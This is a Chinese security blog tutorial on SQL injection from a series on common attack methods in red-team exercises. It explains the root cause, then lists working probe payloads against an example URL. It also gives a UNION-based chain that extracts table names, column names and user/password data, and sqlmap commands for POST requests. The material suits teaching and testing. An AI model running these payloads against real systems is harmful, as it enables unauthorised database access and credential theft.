HW常见攻击方式 -- SQL注入漏洞 - Kirin博客

HW常见攻击方式 -- SQL注入漏洞

作者: Bee

全网最全的网络资源分享网站

特别声明:部分文章为网络转载,资源使用一般不提供任何帮助,特殊资源除外,如有侵权请联系站长!请勿违法!本站文章仅供学习了解!技术无罪!

一、产生原因
代码与数据不区分。程序把用户输入的恶意内容传入SQL语句中执行,导致SQL注入漏洞产生。


二、常见挖掘方式

直接对url中的参数(请求参数、请求头)进行注入

Burp抓取post包进行注入


三、判断注入点

单引号判断:如果出现错误回显,则该页面就可能存在sql注入

http://www.webanquangongjuku.com/aiyou.php?id=1'

and判断:

http://www.webanquangongjuku.com/aiyou.php?id=1' and 1=1 返回正常http://www.webanquangongjuku.com/aiyou.php?id=1' and1=2 如果报错,说明存在注入

or判断:

http://www.webanquangongjuku.com/aiyou.php?id=1' or 1=1 http://www.webanquangongjuku.com/aiyou.php?id=1' or 1=2 返回正常,说明存在注入

XOR判断:后面的语句如果是正确的,则返回错误页面,如果是错误的,则返回正确页面,说明存在注入点

http://www.webanquangongjuku.com/aiyou.php?id=1' xor 1=1 http://www.webanquangongjuku.com/aiyou.php?id=1' xor 1=2

加减号数字判断:返回的页面和前面的页面相同,加上-1,返回错误页面,则表示存在注入漏洞

http://www.webanquangongjuku.com/aiyou.php?id=10-1


四、GET请求注入流程:

1、判断是否存在注入

1' 1' and 1=1

2、判断可显示列

1' order by 2#1' order by 3# 1' union select 1,2#

3、查询版本号和数据库

1' union select version(),database()#

4、获取当前数据库的所有表名

1' union select 1,table_name from information_schema.tables where table_schema=database()#

5、获取users表的列名

1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#

6、获取users表的user和password列

1' union select user,password from users#


五、POST请求注入流程

1、通过BurpSuite抓包

2、可以手动判断,但是能用sqlmap就不用手动,所以将该包保存到1.txt文件

sqlmap -r 1.txt


3、查看是不是管理员权限

sqlmap -r 1.txt --is-dba


禁止非法,后果自负

本文最后更新于2021-3-19,已超过 1 年没有更新,如果文章内容或图片资源失效,请留言反馈,我们会及时处理,谢谢!
分享到:
加入交流群
未经允许不得转载:

作者: Bee, 转载或复制请以 超链接形式 并注明出处 Kirin博客
原文地址: 《HW常见攻击方式 -- SQL注入漏洞》 发布于2021-3-19

切换注册

登录

您也可以使用第三方帐号快捷登录

切换登录

注册

觉得文章有用就加入交流群吧

QQ扫一扫